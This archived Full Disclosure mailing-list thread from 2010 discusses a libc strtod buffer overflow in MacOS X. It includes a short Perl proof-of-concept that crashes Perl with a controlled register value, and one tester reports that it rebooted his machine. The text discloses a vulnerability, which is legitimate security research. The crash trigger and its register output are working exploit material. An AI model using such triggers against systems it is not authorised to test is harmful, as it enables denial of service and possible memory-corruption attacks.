Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: MacOS X 10.5/10.6 libc/strtod(3) buffer overflow
From: Maksymilian Arciemowicz <cxib () securityreason com>
Date: Mon, 11 Jan 2010 20:46:21 +0100

I have not checked this issue in macos 10.4. In MacOS 10.1 does not
work. But the perl script (in macos 10.5)

Chujwamwmuzg.pl ---
#!/usr/local/bin/perl
printf "% 0.4194310f, 0x0.0x41414141;
Chujwamwmuzg.pl ---

will crash with
esi = 0x41414141
edi = 0x15

Other bugs in libc also work on new versions of macos. Example overflow
in FTSENT structure

http://securityreason.com/achievement_securityalert/60
http://securityreason.com/achievement_securityalert/68

We confirmed this issue in MacOS 10.1.


Joshua Levitsky wrote:
and it then rebooted my mac :)

On Mon, Jan 11, 2010 at 1:57 PM, Joshua Levitsky <jlevitsk () joshie com
<mailto:jlevitsk () joshie com>> wrote:

    The below hosed my terminal session on 10.4.11... I did this in a
    >console login so don't have the results.. You need? or is dropping
    me to a blue screen and lack of system response good? 

    #!/usr/local/bin/perl
    printf "%0.4194310f", 0x0.0x41414141;


    Perl will crash with
    esi = 0x41414141
    edi = 0x15

    -Josh

-- 
Best Regards,
------------------------
pub   1024D/A6986BD6 2008-08-22
uid                  Maksymilian Arciemowicz (cxib)
<cxib () securityreason com>
sub   4096g/0889FA9A 2008-08-22

http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

Attachment: signature.asc
Description: OpenPGP digital signature

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]